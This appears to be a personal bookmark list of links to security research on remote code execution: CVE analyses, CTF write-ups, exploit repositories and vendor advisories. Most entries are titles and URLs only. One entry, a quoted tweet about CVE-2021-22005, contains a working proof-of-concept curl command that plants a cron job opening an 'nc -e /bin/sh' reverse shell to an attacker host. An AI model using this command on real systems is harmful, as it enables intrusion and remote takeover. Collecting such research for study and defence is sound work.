Getting RCE on Monero forums with wrapwrap
June 12, 2025 at 7:12:27 AM UTC * - permalink -

- https://swap.gs/posts/monero-forums/

World's First MIDI Shellcode :: portasynthinca3's blog
January 6, 2025 at 6:20:53 PM UTC * - permalink -

- https://psi3.ru/blog/swl01u/

Liferay Json Deserialize 1 hit RCE
November 20, 2024 at 3:20:37 PM UTC * - permalink -

- https://gist.github.com/testanull/4f8a9305b5b57ab8e7f15bbb0fb93461

mm0r1/exploits: Pwn stuff.
December 15, 2022 at 8:57:15 AM UTC * - permalink -

- https://github.com/mm0r1/exploits/

Multiple vulnerabilities in H2O - Raft_RCE.pdf
December 14, 2022 at 10:54:10 AM UTC - permalink -

- https://www.synacktiv.com/sites/default/files/2022-12/Raft_RCE.pdf

GLPI htmlawed (CVE-2022-35914) | Mayfly
October 3, 2022 at 10:42:31 AM UTC - permalink -

- https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/

barrracud4/image-upload-exploits: This repository contains various media files for known attacks on web applications processing media files. Useful for penetration tests and bug bounty.
September 24, 2022 at 9:50:18 PM UTC * - permalink -

- https://github.com/barrracud4/image-upload-exploits

Liferay Portal Json Web Service Deserialization Vulnerability (CVE-2020–7961) Analysis | by Knownsec 404 team | Medium
September 22, 2022 at 12:15:30 PM UTC * - permalink -

- https://medium.com/@knownsec404team/liferay-portal-json-web-service-deserialization-vulnerability-cve-2020-7961-analysis-ca9f24478274

Solving "includer's revenge" from hxp ctf 2021 without controlling any files
September 7, 2022 at 9:09:08 AM UTC - permalink -

- https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d

CVE-2021-22205 | AttackerKB
December 14, 2021 at 5:16:31 PM UTC - permalink -

- https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog

Exploiting JNDI Injections in Java | Veracode blog
December 10, 2021 at 2:57:57 PM UTC - permalink -

- https://www.veracode.com/blog/research/exploiting-jndi-injections-java

GitLab CE CVE-2021-22205 in the wild - hn security
November 3, 2021 at 2:46:00 PM UTC - permalink -

- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/

java.lang.Runtime.exec() Payload Workarounds - @Jackson_T
October 21, 2021 at 12:49:07 PM UTC * - permalink -

- https://ares-x.com/tools/runtime-exec/

wvu on Twitter: "CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/bwjMA21ifA" / Twitter
September 28, 2021 at 2:34:36 PM UTC - permalink -

- https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1

What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
September 10, 2021 at 9:19:13 PM UTC - permalink -

- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

反制爬虫之Burp Suite RCE
September 6, 2021 at 9:42:51 AM UTC - permalink -

- http://noahblog.360.cn/burp-suite-rce/

writeups/Apple-RCE.md at main · httpvoid/writeups
August 19, 2021 at 2:53:11 PM UTC - permalink -

- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md

Sophos UTM Preauth RCE: A Deep Dive into CVE-2020-25223 — Atredis Partners
August 19, 2021 at 2:10:52 PM UTC - permalink -

- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

- LFI With PHPInfo Assistance.pdf
August 19, 2021 at 1:49:00 PM UTC - permalink -

- https://insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

Fortinet FortiWeb OS Command Injection | Rapid7 Blog
August 19, 2021 at 1:48:24 PM UTC - permalink -

- https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/